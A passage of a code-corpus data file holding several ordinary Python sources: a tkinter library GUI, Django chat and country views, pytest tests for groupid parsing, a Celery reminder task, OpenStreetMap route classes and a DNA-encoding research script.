int(imageSizeWidth*n)\r\nif same:\r\n newImageSizeHeight = int(imageSizeHeight*n) \r\nelse:\r\n newImageSizeHeight = int(imageSizeHeight/n) \r\n \r\nbackground_image = background_image.resize((newImageSizeWidth,newImageSizeHeight),Image.ANTIALIAS)\r\nimg = ImageTk.PhotoImage(background_image)\r\n\r\nCanvas1 = Canvas(root)\r\n\r\nCanvas1.create_image(300,340,image = img) \r\nCanvas1.config(bg=\"white\",width = newImageSizeWidth, height = newImageSizeHeight)\r\nCanvas1.pack(expand=True,fill=BOTH)\r\n\r\nheadingFrame1 = Frame(root,bg=\"#333945\",bd=5)\r\nheadingFrame1.place(relx=0.2,rely=0.1,relwidth=0.6,relheight=0.16)\r\n\r\nheadingFrame2 = Frame(headingFrame1,bg=\"#EAF0F1\")\r\nheadingFrame2.place(relx=0.01,rely=0.05,relwidth=0.98,relheight=0.9)\r\n\r\nheadingLabel = Label(headingFrame2, text=\"Welcome to RCPL Library\", fg='black')\r\nheadingLabel.place(relx=0.25,rely=0.1, relwidth=0.5, relheight=0.5)\r\n\r\nbtn1 = Button(root,text=\"Employee\",bg='black', fg='white', command=Employee)\r\nbtn1.place(relx=0.25,rely=0.3, relwidth=0.2,relheight=0.1)\r\n\r\nbtn2 = Button(root,text=\"Student\",bg='black', fg='white', command=Student)\r\nbtn2.place(relx=0.55,rely=0.3, relwidth=0.2,relheight=0.1)\r\n","repo_name":"rupalbohra/python","sub_path":"python assignment/timetable.py","file_name":"timetable.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"39063217804","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\n\"\"\"\n@author: aprilvkuo\n@license: Apache Licence \n@site: http://aprilvkuo.github.io\n@software: PyCharm Community Edition\n@file: 能源1.py\n@time: 
2017/8/17 17:37\n\"\"\"\n\n\ndef func():\n while True:\n try:\n data = input().split(' ')\n x,y = int(data[0]),int(data[1])\n while x!=y:\n if x>y:\n x = x >> 1\n else:\n y = y >> 1\n print(x)\n except:\n return\n\n\n\n\nif __name__ == '__main__':\n func()","repo_name":"aprilvkuo/sword_for_offer","sub_path":"python/能源1.py","file_name":"能源1.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"2080877295","text":"from django.db.models import Q\nfrom django.shortcuts import render\nfrom django.views import View\n\nfrom rest_framework.decorators import api_view, authentication_classes, permission_classes\nfrom rest_framework.response import Response\nfrom rest_framework import authentication, permissions\nfrom App.models import ChatRoom, PrivateMessage, Group, GroupMessages\nfrom App.serializers import ChatRoomSerializers, RoomMessageSerializers, HomeFeedSerializers, GroupMessageSerializer\nfrom rest_framework.views import APIView\nfrom rest_framework.generics import ListAPIView\nfrom user.models import User\n\nfrom collections import namedtuple\n\n\n\n@api_view(['GET', 'POST'])\ndef api_room_view(request):\n user = request.user\n rooms = ChatRoom.objects.filter(Q(user1=user) | Q(user2=user))\n instance = ChatRoomSerializers(rooms, many=True).data\n return Response(instance)\n\n\nclass RoomMessages(APIView):\n def get(self, request, *args, **kwargs):\n data = {}\n user2 = User.objects.get(username=kwargs['username'])\n room = ChatRoom.objects.filter(Q(user1=request.user, user2=user2) | Q(user2=request.user, user1=user2)).first()\n messages = PrivateMessage.manage.get_queryset(room=room)\n instance = RoomMessageSerializers(messages, context={\n 'request': request\n }, many=True).data\n # instance[\"unread\"] = 22\n return Response(instance)\n\n\n@api_view(['GET'])\ndef api_all_rooms(request):\n user = request.user\n all_rooms = namedtuple('RoomType', ['favourite_users', 'usersList', 'channelList'])\n rooms = all_rooms(\n favourite_users=[x for x in user.profile.favourite.all() if PrivateMessage.objects.filter(room=x)],\n usersList=[x for x in ChatRoom.objects.filter(Q(user1=user) | Q(user2=user))\n if x not in user.profile.favourite.all()],\n channelList=Group.objects.filter(members__participant=user)\n )\n instance = HomeFeedSerializers(rooms, context={\n \"request\": request\n }).data\n\n return Response(instance)\n\n\n@api_view(['GET', ])\ndef api_group_messages(request, group_id):\n group = Group.objects.get(id=group_id)\n messages = GroupMessages.manage.get_queryset(room=group)\n instance = GroupMessageSerializer(messages, many=True).data\n return Response(instance)\n","repo_name":"A1bdul/ChatApp","sub_path":"App/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"8824411392","text":"import pytest\n\nfrom h.util import group as group_util\n\n\nclass TestSplitGroupID:\n @pytest.mark.parametrize(\n \"groupid,authority_provided_id,authority\",\n [\n (\"group:flashbang@dingdong.com\", \"flashbang\", \"dingdong.com\"),\n (\"group:ffff@dingdong.com\", \"ffff\", \"dingdong.com\"),\n (\"group:.@dingdong.com\", \".\", \"dingdong.com\"),\n (\"group:group@yep.nope\", \"group\", \"yep.nope\"),\n (\"group:()@hi.co\", \"()\", \"hi.co\"),\n (\"group:!.~--_*'@hi.co\", \"!.~--_*'\", \"hi.co\"),\n ],\n )\n def test_it_splits_valid_groupids(self, groupid, authority_provided_id, 
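The func above (from 能源1.py, roughly "energy 1") repeatedly halves the larger of the two inputs until they meet. Since k >> 1 is the parent of node k in a 1-indexed array-backed binary tree, the loop converges on the lowest common ancestor of the two node indices. A standalone sketch with sanity checks; the function name is ours, not the original file's:

def lowest_common_ancestor(x, y):
    # In a 1-indexed binary heap layout, node k has parent k >> 1;
    # repeatedly move the deeper (larger-index) node up until both meet.
    while x != y:
        if x > y:
            x >>= 1
        else:
            y >>= 1
    return x

assert lowest_common_ancestor(6, 7) == 3    # siblings meet at their parent
assert lowest_common_ancestor(1, 10) == 1   # the root is an ancestor of every node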
authority):\n splitgroup = group_util.split_groupid(groupid)\n\n assert splitgroup[\"authority_provided_id\"] == authority_provided_id\n assert splitgroup[\"authority\"] == authority\n\n @pytest.mark.parametrize(\n \"groupid\",\n [\n \"groupp:whatnot@dingdong.co\",\n \"grou:whatnot@dingdong.co\",\n \"group:@dingdog.com\",\n \"group:@\",\n \"whatnot@dingdong.co\",\n \"group:@@dingdong.com\",\n \"group:\\\\f!orklift@sprongle.co\",\n \"group:another:@ding.com\",\n ],\n )\n def test_it_raises_ValueError_on_invalid_groupids(self, groupid):\n with pytest.raises(ValueError, match=\"valid groupid\"):\n group_util.split_groupid(groupid)\n\n\nclass TestIsGroupid:\n @pytest.mark.parametrize(\n \"maybe_groupid,result\",\n [\n (\"group:flashbang@dingdong.com\", True),\n (\"group::ffff@dingdong.com\", False),\n (\"group:\\\\f!orklift@sprongle.co\", False),\n (\"group:.@dingdong.com\", True),\n (\"group:group@yep.nope\", True),\n (\"group:()@hi.co\", True),\n (\"group:!.~--_*'@hi.co\", True),\n (\"groupp:whatnot@dingdong.co\", False),\n (\"grou:whatnot@dingdong.co\", False),\n (\"group:@dingdog.com\", False),\n (\"group:@\", False),\n (\"whatnot@dingdong.co\", False),\n (\"group:@@dingdong.com\", False),\n ],\n )\n def test_it_detects_groupid_validity(self, maybe_groupid, result):\n assert group_util.is_groupid(maybe_groupid) is result\n","repo_name":"hypothesis/h","sub_path":"tests/h/util/group_test.py","file_name":"group_test.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","stars":2810,"dataset":"github-code","pt":"38"} +{"seq_id":"19167348509","text":"# tasks.py\n# tasks.py\nfrom celery import shared_task\nfrom django.utils import timezone\nfrom datetime import timedelta\nfrom django.core.mail import send_mail\nfrom .models import Document\n\n@shared_task\ndef send_document_reminder(user_email):\n user_documents = Document.objects.filter(car__user__email=user_email)\n \n # Calculate the date 1 month from now\n due_date_threshold = timezone.now() + timedelta(days=30)\n\n almost_due_documents = user_documents.filter(due_date__lte=due_date_threshold)\n\n for document in almost_due_documents:\n subject = f\"Reminder: Your document '{document.title}' is almost due\"\n message = f\"Your document '{document.title}' is almost due. 
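The parametrized cases above pin down the groupid grammar: group:<authority_provided_id>@<authority>, where the id part is non-empty and drawn from alphanumerics plus a small punctuation set. One regex-based splitter that satisfies all of the listed cases (our illustration; the real h implementation may differ):

import re

GROUPID_RE = re.compile(r"^group:([A-Za-z0-9._~!*'()-]+)@(.+)$")

def split_groupid(groupid):
    match = GROUPID_RE.match(groupid)
    if match is None:
        raise ValueError(f"{groupid!r} is not a valid groupid")
    return {"authority_provided_id": match.group(1), "authority": match.group(2)}

print(split_groupid("group:flashbang@dingdong.com"))
# {'authority_provided_id': 'flashbang', 'authority': 'dingdong.com'}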
Please take action.\"\n recipient_list = [user_email]\n\n send_mail(subject, message, \"your_email@example.com\", recipient_list)\n# tasks.py (update this file)\nfrom celery.schedules import crontab\n\nCELERY_BROKER_URL = 'redis://localhost:6379/0' # Update with your broker URL\n\nCELERY_BEAT_SCHEDULE = {\n 'send-document-reminder': {\n 'task': 'your_app.tasks.send_document_reminder',\n 'schedule': crontab(minute=0, hour=0), # Run every day at midnight\n },\n}\n","repo_name":"Luis-Huachaca-HV/CarConnect","sub_path":"car_project/cars/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"34882949898","text":"\nCONSTRUCTION_KEYS = (\n 'construction',\n 'proposed',\n 'construction:railway',\n 'proposed:railway',\n)\n\nclass Route:\n def __init__(self, route_id, relation, city):\n \n self.city = city\n self.element = relation\n self.route_id = route_id\n \n self.type = relation['type']\n self.route = relation['route']\n self.name = relation['name']\n self.ref = relation.get('ref', None)\n self.operator = relation.get('operator', None)\n self.version = relation.get('public_transport:version', None)\n self.route_from = relation.get('from', None)\n self.route_to = relation.get('to', None)\n \n self.official_name = ''\n self.roundtrip = ''\n self.via = ''\n self.fee = ''\n self.charge = ''\n self.stops = []\n \n if self.version is None:\n city.warn('Public transport version is 1, which means the route is an unsorted pile of objects', relation)\n \n if self.ref is None:\n city.warn('Missing ref on a route', relation)\n\n if self.route_from is None:\n city.warn('Missing \"from\" on a route', relation)\n\n if self.route_to is None:\n city.warn('Missing \"to\" on a route', relation)\n\n def __len__(self):\n return len(self.stops)\n\n def __getitem__(self, i):\n return self.stops[i]\n\n def __iter__(self):\n return iter(self.stops)\n\n def __repr__(self):\n return (\n 'Route(id={}, type={}, ref={}, name={}, network={}, from={}, to={}'\n ).format(\n self.route_id,\n self.type,\n self.ref,\n self.name,\n self.operator,\n self.route_from,\n self.route_to,\n )\n \n @staticmethod\n def is_route(el, modes):\n if el['type'] != 'relation' or el.get('tags', {}).get('type') != 'route':\n return False\n if 'members' not in el:\n return False\n if el['tags'].get('route') not in modes:\n return False\n for k in CONSTRUCTION_KEYS:\n if k in el['tags']:\n return False\n if 'ref' not in el['tags'] and 'name' not in el['tags']:\n return False\n return True\n\nclass RouteMaster:\n def __init__(self, ref, relation, city):\n self.relation = relation\n self.city = city\n\n self.ref = ref\n self.name = ''\n self.official_name = ''\n self.routes = []\n\n def __repr__(self):\n text = 'RouteMaster(ref={}, count={})'.format(self.ref, len(self.routes))\n for r in self.routes:\n text = text + '\\n\\t' + str(r)\n \n return text\n ","repo_name":"anodern/bus-validation","sub_path":"route.py","file_name":"route.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"32904470877","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 31 11:26:38 2022\n\n@author: omers\n\"\"\"\nimport os\nimport sys\nprojectDir = os.environ.get('EUCLID')\nif projectDir == None:\n projectDir = \"D:/Euclid/\"\nsys.path.insert(1, projectDir)\nfrom produceEuclidEncoding import *\nfrom analysisFunctions import 
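Route.is_route above accepts an element only when it is a relation tagged type=route, has members, uses one of the allowed modes, carries none of the construction/proposed keys, and has at least a ref or a name. A self-contained mirror of that predicate, with an invented sample element for quick experimentation:

CONSTRUCTION_KEYS = ('construction', 'proposed', 'construction:railway', 'proposed:railway')

def looks_like_route(el, modes=('bus',)):
    # Mirrors the checks performed by Route.is_route.
    tags = el.get('tags', {})
    return (
        el.get('type') == 'relation'
        and tags.get('type') == 'route'
        and 'members' in el
        and tags.get('route') in modes
        and not any(k in tags for k in CONSTRUCTION_KEYS)
        and ('ref' in tags or 'name' in tags)
    )

sample = {
    'type': 'relation',
    'members': [{'type': 'node', 'ref': 1}],
    'tags': {'type': 'route', 'route': 'bus', 'ref': '42'},
}
assert looks_like_route(sample)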
windowedGCcontent, gcVariance\nimport matplotlib.pyplot as plt\nimport mapping\nimport produceEuclidEncoding\nimport convolutional\nimport scipy.io\nimport numpy as np\nimport binaryToDna\n\nEXAMPLE_SEQUENCE = 'TTTTTCGATTTTTGACCACGAAACCACCCTGACGGCCGCGAAAAAAAACATCCATCAAAAAGGGAAAAAAAAAAAAAAGAAAAAAAGGAAACAATTAAAAAAAGAAAAAAAAAAAAAACTAAAAAAAAAAAAGACGAAACACAAAAAAAAAGAAAAAAAAAAAAAAGTAAAAAAAAAAAAGATGAAACACGGAAAAAACCAAAAAAAAAAAAAAACAAAAAAAAAAAAGCGGAAACACGTAAAAAACCAAAAAAAAAAAAAAACAA'\n\nEXAMPLE_HOMOPOLYMER = 'A' * 266\n\nEXAMPLE_HOMOPOLYMERS = 'A' * 66 + 'C' * 66 + 'T' * 66 + 'G' * 66 + 'ACTG'\n\nEXAMPLE_STR1 = 'ACTG' * 133\n\ndef saveFSM(states, triggers, transitionDictionary, path = projectDir, fileName = 'example'):\n workspaceDict = {}\n workspaceDict['states'] = states\n workspaceDict['triggers'] = triggers\n workspaceDict['transitionDictionary'] = transitionDictionary\n fileNameWithPath = path + \"/\" + fileName + '.mat'\n scipy.io.savemat(fileNameWithPath, workspaceDict)\n return fileNameWithPath\n \ndef encodeUsingExampleFromFile(fileName, sequence):\n workspaceDict = np.load(fileName, allow_pickle = 'TRUE').item()\n #outputDictionary = workspaceDict['outputDictionary']\n outputFSM = workspaceDict['outputFSM']\n verticalSymbols = workspaceDict['vsym']\n horizontalSymbols = workspaceDict['hsym']\n triggerLength = len(horizontalSymbols[0])\n status, binaryTextLine, binaryLineNumerical = mapping.dnaToBinary(sequence)\n nucStream = mapping.binaryStreamToBases(binaryTextLine)\n symbolSize = len(verticalSymbols[0]) // 2\n print(symbolSize)\n initialState = '0'*2*symbolSize\n euclidFSM = convolutional.makeEuclidFSM(verticalSymbols, horizontalSymbols, outputFSM, initialState)\n if (len(binaryTextLine) % triggerLength) != 0:\n padding = '0' * (triggerLength - (len(binaryTextLine) % triggerLength))\n binaryTextLine = binaryTextLine + padding\n encodedStream = convolutional.FSMdictionaryEncoder(binaryTextLine, euclidFSM)\n \n flatStream = ''\n for sublist in encodedStream:\n flatStream = flatStream + sublist\n encodedNucStream = mapping.binaryStreamToBases(flatStream)\n return encodedNucStream\n \ndef dissertationExample1(windowSize = 20, symbolSize = 5, mechanism = trackGClevel, uncodedSequence = None, fileName = \"example\", gcMin = 0.25, gcMax = 0.75, runLength = 10):\n workspaceDict = {}\n \n example1ConstraintList = {'gcMin': gcMin, 'gcMax': gcMax, 'runLength': runLength}#,\n workspaceDict['constraintList'] = example1ConstraintList\n c, cd, vsym, hsym = euclidCandidates(constraintList = example1ConstraintList, symbolSize = symbolSize) \n \n #numberOfPossibleCandidatesCountMatrix, outputDictionary, outputFSM, verticalSymbols, horizontalSymbols = makeFSM(c, vsym, hsym, minimiseReservedValue)\n numberOfPossibleCandidatesCountMatrix, outputDictionary, outputFSM, verticalSymbols, horizontalSymbols = makeFSM(c, vsym, hsym, mechanism)\n \n triggerLength = len(horizontalSymbols[0])\n if uncodedSequence == None:\n uncodedSequence = EXAMPLE_SEQUENCE\n\n status, binaryTextLine, binaryLineNumerical = mapping.dnaToBinary(uncodedSequence)\n nucStream = mapping.binaryStreamToBases(binaryTextLine)\n \n #print(nucStream == mapping.binaryStreamToBases(binaryTextLine))\n initialState = '0'*2*symbolSize\n euclidFSM = convolutional.makeEuclidFSM(verticalSymbols, horizontalSymbols, outputFSM, initialState)\n if (len(binaryTextLine) % triggerLength) != 0:\n padding = '0' * (triggerLength - (len(binaryTextLine) % triggerLength))\n binaryTextLine = binaryTextLine + padding\n encodedStream = 
convolutional.FSMdictionaryEncoder(binaryTextLine, euclidFSM)\n \n flatStream = ''\n for sublist in encodedStream:\n flatStream = flatStream + sublist\n encodedNucStream = mapping.binaryStreamToBases(flatStream)\n\n \n \n fig, ax = plt.subplots()\n status, slidingPointsSource, gcContentSource, GC, AT, other = windowedGCcontent(uncodedSequence, windowSize)\n txt = 'Source sequence, window size ' +str(windowSize)\n ax.plot(slidingPointsSource, gcContentSource, linewidth=2.0, label = txt)\n status, slidingPointsEncoded1, gcContentEncoded1, GC, AT, other = windowedGCcontent(encodedNucStream, windowSize)\n txt = 'Encoded, window size ' +str(windowSize)\n ax.plot(slidingPointsEncoded1, gcContentEncoded1, linewidth=2.0, label = txt)\n ax.set(ylim=(0, 1))\n ax.grid(True)\n ax.set_xlabel(\"Index of window start position. Window size = \" + str(windowSize) + \"bases\", size = 24)\n ax.set_ylabel(\"GC content normalised\", size = 24)\n ax.set_title('GC content calculated on a sliding windows', size = 24)\n ax.tick_params(axis = 'both', which = 'major', labelsize = 24)\n ax.vlines(slidingPointsSource[-1], 0, 1, colors = 'red', linewidth = 2.5, linestyle = '--')\n ax.vlines(slidingPointsEncoded1[-1], 0, 1, colors = 'red', linewidth = 2.5, linestyle = '--')\n averageGCSourceTxt = \"Average sliding window GC content \" + str(np.average(gcContentSource))\n ax.hlines(np.average(gcContentSource), slidingPointsSource[0], slidingPointsSource[-1], colors = 'red', linestyle = '-', linewidth = 2.0, label = averageGCSourceTxt)\n #ax.hlines(np.average(gcContentSource), slidingPointsSource[0], slidingPointsSource[-1], colors = 'red', linestyle = '-', linewidth = 2.0)\n averageGCEncodedTxt = \"Average sliding window GC content \" + str(np.average(gcContentEncoded1))\n ax.hlines(np.average(gcContentEncoded1), slidingPointsEncoded1[0], slidingPointsEncoded1[-1], colors = 'green', linestyle = '-', linewidth = 2.0, label = averageGCEncodedTxt)\n #ax.hlines(max(gcContentEncoded1), slidingPointsEncoded1[0], slidingPointsEncoded1[-1], colors = 'red', linestyle = '-', linewidth = 2.0)\n plt.legend(fontsize = 24)\n \n workspaceDict['symbolSize'] = symbolSize\n workspaceDict['mechanism'] = str(mechanism)\n workspaceDict['gcMin'] = gcMin\n workspaceDict['gcMax'] = gcMax\n workspaceDict['runLength'] = runLength\n workspaceDict['constraintList'] = example1ConstraintList\n workspaceDict['c'] = c\n workspaceDict['cd'] = cd\n workspaceDict['vsym'] = vsym\n workspaceDict['hsym'] = hsym\n workspaceDict['uncodedSequence'] = uncodedSequence\n workspaceDict['binaryTextLine'] = binaryTextLine\n workspaceDict['binaryLineNumerical'] = binaryLineNumerical\n workspaceDict['nucStream'] = nucStream\n workspaceDict['encodedStream'] = encodedStream\n workspaceDict['encodedNucStream'] = encodedNucStream\n workspaceDict['outputDictionary'] = outputDictionary\n workspaceDict['outputFSM'] = outputFSM\n fileNameWithPath = projectDir + \"/\" + fileName\n scipy.io.savemat(fileNameWithPath + '.mat', workspaceDict)\n np.save(fileNameWithPath + '.npy', workspaceDict)\n #plt.show()\n plt.tight_layout()\n figureFileNameWithPath = projectDir + \"/\" + fileName + '.png'\n plt.savefig(fname = figureFileNameWithPath)\n return numberOfPossibleCandidatesCountMatrix, outputDictionary, outputFSM, verticalSymbols, horizontalSymbols, encodedNucStream\n\ndef openVirusFile(filePath):\n # Function assumes a path to a txt file that contains DNA, possibly with newline breaks \\n, possibly with spaces \" \" and possibly lowercase letters.\n # No safety provided (so if you 
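windowedGCcontent, imported from analysisFunctions, is not shown in this file; from how its return values are plotted above, it evidently yields, among other things, window start positions and per-window GC fractions. A minimal stand-in under that assumption (our sketch, not the project's real implementation):

def windowed_gc_content(sequence, window_size):
    # Fraction of G/C bases in each sliding window of length window_size.
    positions, gc = [], []
    for start in range(len(sequence) - window_size + 1):
        window = sequence[start:start + window_size]
        positions.append(start)
        gc.append(sum(base in 'GC' for base in window) / window_size)
    return positions, gc

positions, gc = windowed_gc_content('ACGTGGCCAATT', 4)
print(gc[0])  # 0.5 -> two of the four bases in 'ACGT' are G/C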
have line numbers for example, remove them)\n dna = ''\n with open(filePath, \"r\") as virusFile:\n for newLine in virusFile:\n lineList = virusFile.readline()\n lineList = lineList.split(\" \")\n 'print(lineList)'\n #line = line.strip(\" \")\n #print(line)\n line = ''\n for word in lineList:\n temp = word.strip('\\n')\n line = line + temp.upper()\n dna = dna + line\n return dna\n\n\n\ndef graphicsForExamples(slidingPoints, gcContent, windowSize, fileName, title = None):\n fig, ax = plt.subplots()\n txt = 'Source sequence, window size ' +str(windowSize)\n ax.plot(slidingPoints, gcContent, linewidth=2.0, label = txt)\n ax.set(ylim=(0, 1))\n ax.grid(True)\n ax.set_xlabel(\"Index of window start position. Window size = \" + str(windowSize) + \"bases\", size = 24)\n ax.set_ylabel(\"GC content normalised\", size = 24)\n if title == None:\n title = 'GC content calculated on a sliding windows'\n ax.set_title(title, size = 24)\n ax.tick_params(axis = 'both', which = 'major', labelsize = 24)\n #ax.vlines(slidingPointsSource[-1], 0, 1, colors = 'red', linewidth = 2.5, linestyle = '--')\n #ax.vlines(slidingPointsEncoded1[-1], 0, 1, colors = 'red', linewidth = 2.5, linestyle = '--')\n averageGCSourceTxt = \"Average sliding window GC content \" + str(np.average(gcContent))\n ax.hlines(np.average(gcContent), slidingPoints[0], slidingPoints[-1], colors = 'red', linestyle = '-', linewidth = 2.0, label = averageGCSourceTxt)\n #ax.hlines(np.average(gcContentSource), slidingPointsSource[0], slidingPointsSource[-1], colors = 'red', linestyle = '-', linewidth = 2.0)\n #averageGCEncodedTxt = \"Average sliding window GC content \" + str(np.average(gcContentEncoded1))\n #ax.hlines(np.average(gcContentEncoded1), slidingPointsEncoded1[0], slidingPointsEncoded1[-1], colors = 'red', linestyle = '-', linewidth = 2.0, label = averageGCEncodedTxt)\n #ax.hlines(max(gcContentEncoded1), slidingPointsEncoded1[0], slidingPointsEncoded1[-1], colors = 'red', linestyle = '-', linewidth = 2.0)\n plt.legend(fontsize = 24)\n plt.tight_layout()\n figureFileNameWithPath = projectDir + \"/\" + fileName + '.png'\n plt.savefig(fname = figureFileNameWithPath) \n\ndef produceGraphicsForMethodology(sequence = None):\n if sequence == None:\n sequence = EXAMPLE_SEQUENCE\n subSequences, occurences = binaryToDna.produceStatsFromSequence(sequence)\n binaryToDna.subSequenceGraphics(subSequences[0:4], occurences[0:4])\n binaryToDna.subSequenceGraphics(subSequences[0:20], occurences[0:20])\n binaryToDna.subSequenceGraphics(subSequences, occurences)\n return\n \n \n \ndef openExample(filePath):\n workSpaceDictionary = np.load(filePath ,allow_pickle='TRUE').item()#scipy.io.loadmat(filePath)\n uncodedStream = (workSpaceDictionary['uncodedSequence'])[0]\n encodedStream = (workSpaceDictionary['encodedNucStream'])[0]\n gcVariance(encodedStream, 50)\n varianceArray, slidingPoints, gcContent, argMaxGCCOntent, argMinGCContent = gcVariance(encodedStream, 50)\n return workSpaceDictionary, uncodedStream, encodedStream, varianceArray, slidingPoints, gcContent, argMaxGCCOntent, argMinGCContent\n #return\n \ndef getLanguage(outputFSM):\n language = []\n for verticalSymbol in outputFSM.keys():\n for trigger in outputFSM[verticalSymbol].keys():\n language.append(outputFSM[verticalSymbol][trigger])\n languageUnique, counts = np.unique(language, return_counts = True)\n return language, languageUnique, counts\n\n\ndef dissertationGraphicsForLanguageDiversity(fileName1, fileName2, title1 = \"G-C Tracking\", title2 = \"Random\"):\n \n workSpaceDictionary1 = 
np.load(fileName1 ,allow_pickle='TRUE').item()\n workSpaceDictionary2 = np.load(fileName2 ,allow_pickle='TRUE').item()\n FSM1 = workSpaceDictionary1['outputFSM']\n FSM2 = workSpaceDictionary2['outputFSM']\n barWidth = 0.35 \n \n \n language1, languageUnique1, gcCounts1 = getLanguage(FSM1)\n language2, languageUnique2, gcCounts2 = getLanguage(FSM2)\n print(len(language1))\n print(len(languageUnique1))\n print(len(language2))\n print(len(languageUnique2))\n fig, ax = plt.subplots()\n bar1 = ax.bar(np.arange(0, len(languageUnique1)), gcCounts1, width = barWidth, align='center', label = title1, tick_label = None)#languageUnique1\n bar2 = ax.bar(np.arange(0, len(languageUnique2)) + barWidth, gcCounts2, width = barWidth, align='center', label = title2, tick_label = None)#languageUnique2\n ax.set_title(\"Output diversity of \" + title1 + \" vs \" + title2, size = 24)\n ax.set_xlabel(\"Possible output symbols\", size = 24)\n ax.set_ylabel(\"Occurences\", size = 24)\n #ax.tick_params(axis='x', Labelsize = 24)\n #ax.tick_params(axis='y', Labelsize = 24)\n plt.yticks(fontsize = 24)\n #plt.xticks(rotation=90, fontsize = 10)\n plt.xticks(fontsize = 24)\n plt.legend(fontsize = 24)\n fig.show()\n \n # workSpaceDictionary = np.load(\"D:/Euclid/random7134066SymbolSize4.npy\" ,allow_pickle='TRUE').item()\n # randomOutputFSM4 = workSpaceDictionary['outputFSM']\n # workSpaceDictionary = np.load(\"D:/Euclid/random7134066SymbolSize5.npy\" ,allow_pickle='TRUE').item()\n # randomOutputFSM5 = workSpaceDictionary['outputFSM']\n # workSpaceDictionary = np.load(\"D:/Euclid/random7134066SymbolSize6.npy\" ,allow_pickle='TRUE').item()\n # randomOutputFSM6 = workSpaceDictionary['outputFSM']\n \n # workSpaceDictionary = np.load(\"D:/Euclid/gcTrackingSymbolSize4.npy\" ,allow_pickle='TRUE').item()\n # gcTrackingOutputFSM4 = workSpaceDictionary['outputFSM']\n # workSpaceDictionary = np.load(\"D:/Euclid/gcTrackingSymbolSize5.npy\" ,allow_pickle='TRUE').item()\n # gcTrackingOutputFSM5 = workSpaceDictionary['outputFSM']\n # workSpaceDictionary = np.load(\"D:/Euclid/gcTrackingSymbolSize6.npy\" ,allow_pickle='TRUE').item()\n # gcTrackingOutputFSM6 = workSpaceDictionary['outputFSM']\n \n \n #ax.xticks(range(len(errorRateListOfFast)),('[10-20)', '[20-30)', '[30-50)', '[50-70)','[70-90)', '[90-120)', ' [120 < )'), rotation=30)\n \n # fig5, ax5 = plt.subplots()\n # langRandom5, langRandomUnique5, randomCounts5 = getLanguage(randomOutputFSM5)\n # gcLang5, gcLangUnique5, gcCounts5 = getLanguage(gcTrackingOutputFSM5)\n \n # fig6, ax6 = plt.subplots()\n # langRandom6, langRandomUnique6, randomCounts6 = getLanguage(randomOutputFSM6)\n # gcLang6, gcLangUnique6, gcCounts6 = getLanguage(gcTrackingOutputFSM6)\n\nif __name__ == '__main__':\n pass\n # projectDir = os.environ.get('EUCLID')\n # if projectDir == None:\n # sys.path.insert(1, projectDir)\n # import argparse\n # import os\n # from produceEuclidEncoding import trackGClevel, completelyRandom\n # # Omer Sella: this is critical - we are setting forking to spawn, otherwise utilisation of multiple GPUs doesn't work properly\n # #multiprocessing.set_start_method('spawn')\n # parser = argparse.ArgumentParser()\n # parser.add_argument('--sequence', type=str, default= 'EXAMPLE_HOMOPOLYMERS')\n # #parser.add_argument('--resetType', type=str, default= 'WORST_CODES')\n # parser.add_argument('--mechanism', type=str, default= 'gcTracking')\n # parser.add_argument('--fileName', type=str, default='example')\n # parser.add_argument('--windowSize', type=int, default=20)\n # 
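getLanguage above flattens every FSM output symbol into one list and hands it to np.unique(..., return_counts=True), which returns the sorted alphabet alongside a usage histogram -- exactly what the diversity bar charts need. The call in isolation:

import numpy as np

language = ['ACGT', 'ACCA', 'ACGT', 'TTGA', 'ACCA', 'ACGT']
unique, counts = np.unique(language, return_counts=True)
print(unique.tolist())  # ['ACCA', 'ACGT', 'TTGA']
print(counts.tolist())  # [2, 3, 1]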
parser.add_argument('--symbolSize', type=int, default=5)\n # parser.add_argument('--gcMin', type=float, default=0.25)\n # parser.add_argument('--gcMax', type=float, default=0.65)\n # parser.add_argument('--runLength', type=int, default=10)\n # parser.add_argument('--seed', type=int, default= 117)\n \n \n # args = parser.parse_args()\n \n # if args.mechanism == 'gcTracking':\n # mech = trackGClevel\n # elif args.mechanism == 'random':\n # mech = completelyRandom\n # else:\n # mech = completelyRandom\n # if args.sequence == 'EXAMPLE_HOMOPOLYMERS':\n # seq = EXAMPLE_HOMOPOLYMERS\n # elif args.sequence == 'EXAMPLE_HOMOPOLYMER':\n # seq = EXAMPLE_HOMOPOLYMER\n # else:\n # seq = args.sequence\n # encodedNucStream = dissertationExample1(windowSize = args.windowSize, symbolSize = args.symbolSize, mechanism = mech, uncodedSequence = seq, fileName = args.fileName, gcMin = args.gcMin, gcMax = args.gcMax, runLength = args.runLength)\n #return encodedNucStream","repo_name":"Omer-Sella/Euclid","sub_path":"examples.py","file_name":"examples.py","file_ext":"py","file_size_in_byte":16000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"73914407151","text":"from django.contrib import messages\nfrom django.http import JsonResponse\nfrom django.urls import reverse_lazy\nfrom django.views import View\nfrom django.views.generic import ListView, CreateView, UpdateView, TemplateView\nfrom core.utiles.permission_required import PermissionRequiredMixin\nfrom nomencladores.forms.form_pais import PaisForm\nfrom nomencladores.models.pais import Pais\n\n\nclass ListadoPaisesView(PermissionRequiredMixin, ListView):\n model = Pais\n template_name = 'pais/listado_paises.html'\n paginate_by = 10\n permission = 'nomencladores.view_pais'\n\n def get_queryset(self):\n paises = Pais.objects.all().order_by('nombre')\n\n q = self.request.GET.get('q')\n if q is not None and q != \"\":\n paises = paises.filter(nombre__icontains=q)\n\n return paises\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['titulo'] = 'Listado de países'\n context['activar_nomencladores'] = True\n context['path'] = 